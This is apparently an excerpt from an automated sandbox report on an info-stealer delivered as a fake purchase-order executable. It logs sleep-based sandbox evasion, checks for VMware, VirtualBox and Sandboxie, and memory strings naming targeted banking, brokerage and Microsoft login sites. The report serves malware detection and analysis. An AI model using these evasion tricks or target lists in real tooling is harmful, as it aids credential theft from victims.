Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -594812s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -594702s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -594593s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -594484s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe TID: 3376	Thread sleep time: -25825441703193356s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe TID: 1592	Thread sleep count: 8478 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe TID: 1592	Thread sleep count: 789 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe TID: 1824	Thread sleep count: 56 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe TID: 1824	Thread sleep time: -56000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe TID: 1616	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep count: 34 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -31359464925306218s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -600000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4196	Thread sleep count: 3173 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -599875s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4196	Thread sleep count: 6679 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -599765s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -599656s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -599546s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -599437s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -599328s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -599218s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -599109s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -598999s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -598890s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -598781s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -598671s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -598561s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -598452s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -598343s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -598234s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -598124s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -598015s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -597901s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -597692s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -597570s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -597453s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -597343s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -597234s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -597125s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -597015s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -596906s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -596796s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -596687s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -596577s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -596468s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -596359s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -596250s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -596140s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -596030s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -595921s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -595812s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -595703s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -595593s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -595484s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -595375s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -595265s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -595152s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -595031s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -594921s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -594812s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -594703s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -594593s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4216	Thread sleep time: -594484s >= -30000s

Source: C:\Windows\SysWOW64\PING.EXE	Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE	Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE	Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE	Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE	Last function: Thread delayed

Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599848	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599592	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599046	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598608	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598499	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598384	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598155	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598046	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597827	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597499	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597389	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597280	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597171	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596946	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596816	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596695	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596124	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595465	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595358	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595249	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594702	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594484	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599656
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599546
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598999
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598671
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598561
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598452
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598343
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597901
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597692
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597343
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597125
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596906
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596796
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596687
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596359
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595921
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595812
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595703
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595593
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595484
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595375
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595265
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595031
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594921
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594812
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594703
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594593
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594484

Source: InstallUtil.exe, 00000014.00000002.2622090959.000000000392B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696497155
Source: InstallUtil.exe, 00000014.00000002.2622090959.000000000392B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: InstallUtil.exe, 00000014.00000002.2622090959.0000000003C51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x
Source: InstallUtil.exe, 00000014.00000002.2622090959.0000000003C51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: InstallUtil.exe, 00000014.00000002.2622090959.0000000003C51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: InstallUtil.exe, 00000014.00000002.2622090959.0000000003C51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: InstallUtil.exe, 00000014.00000002.2622090959.0000000003C51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696497155\|UE
Source: InstallUtil.exe, 00000014.00000002.2622090959.0000000003C51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696497155
Source: InstallUtil.exe, 00000014.00000002.2622090959.0000000003C51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696497155s
Source: InstallUtil.exe, 00000014.00000002.2622090959.0000000003C51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696497155f
Source: InstallUtil.exe, 00000014.00000002.2622090959.0000000003C51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: InstallUtil.exe, 00000014.00000002.2622090959.0000000003C51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: InstallUtil.exe, 00000014.00000002.2622090959.000000000392B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: InstallUtil.exe, 00000014.00000002.2622090959.000000000392B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: InstallUtil.exe, 00000014.00000002.2622090959.000000000392B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: InstallUtil.exe, 00000014.00000002.2622090959.000000000392B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: InstallUtil.exe, 00000014.00000002.2622090959.000000000392B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: InstallUtil.exe, 00000014.00000002.2622090959.000000000392B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: InstallUtil.exe, 00000014.00000002.2622090959.0000000003C51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: InstallUtil.exe, 00000014.00000002.2622090959.0000000003C51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: InstallUtil.exe, 00000014.00000002.2622090959.0000000003C51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: InstallUtil.exe, 00000014.00000002.2622090959.000000000392B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: InstallUtil.exe, 00000014.00000002.2622090959.0000000003C51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: InstallUtil.exe, 00000014.00000002.2622090959.000000000392B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: InstallUtil.exe, 00000014.00000002.2622090959.000000000392B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: InstallUtil.exe, 00000014.00000002.2622090959.0000000003C51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: InstallUtil.exe, 00000014.00000002.2622090959.000000000392B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696497155f
Source: InstallUtil.exe, 00000014.00000002.2622090959.0000000003C51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: InstallUtil.exe, 00000014.00000002.2622090959.000000000392B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: InstallUtil.exe, 00000014.00000002.2622090959.0000000003C51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: InstallUtil.exe, 00000014.00000002.2622090959.000000000392B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: InstallUtil.exe, 00000014.00000002.2622090959.000000000392B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696497155s
Source: InstallUtil.exe, 00000014.00000002.2622090959.0000000003C51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: InstallUtil.exe, 00000014.00000002.2622090959.0000000003C51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: InstallUtil.exe, 00000014.00000002.2622090959.000000000392B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: InstallUtil.exe, 00000014.00000002.2622090959.0000000003C51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696497155
Source: InstallUtil.exe, 00000014.00000002.2622090959.000000000392B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696497155j
Source: InstallUtil.exe, 00000014.00000002.2622090959.000000000392B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe, 00000000.00000002.1541699498.0000000004DD0000.00000004.08000000.00040000.00000000.sdmp, CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe, 00000000.00000002.1534523636.0000000003770000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VBoxTray
Source: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe, 00000000.00000002.1534523636.0000000003770000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: sandboxierpcssGSOFTWARE\VMware, Inc.\VMware VGAuth
Source: InstallUtil.exe, 00000014.00000002.2622090959.0000000003C51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696497155j
Source: InstallUtil.exe, 00000014.00000002.2622090959.0000000003C51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696497155o
Source: InstallUtil.exe, 00000014.00000002.2622090959.0000000003C51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: InstallUtil.exe, 00000014.00000002.2622090959.0000000003C51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: InstallUtil.exe, 00000014.00000002.2622090959.000000000392B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: InstallUtil.exe, 00000014.00000002.2622090959.000000000392B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696497155\|UE
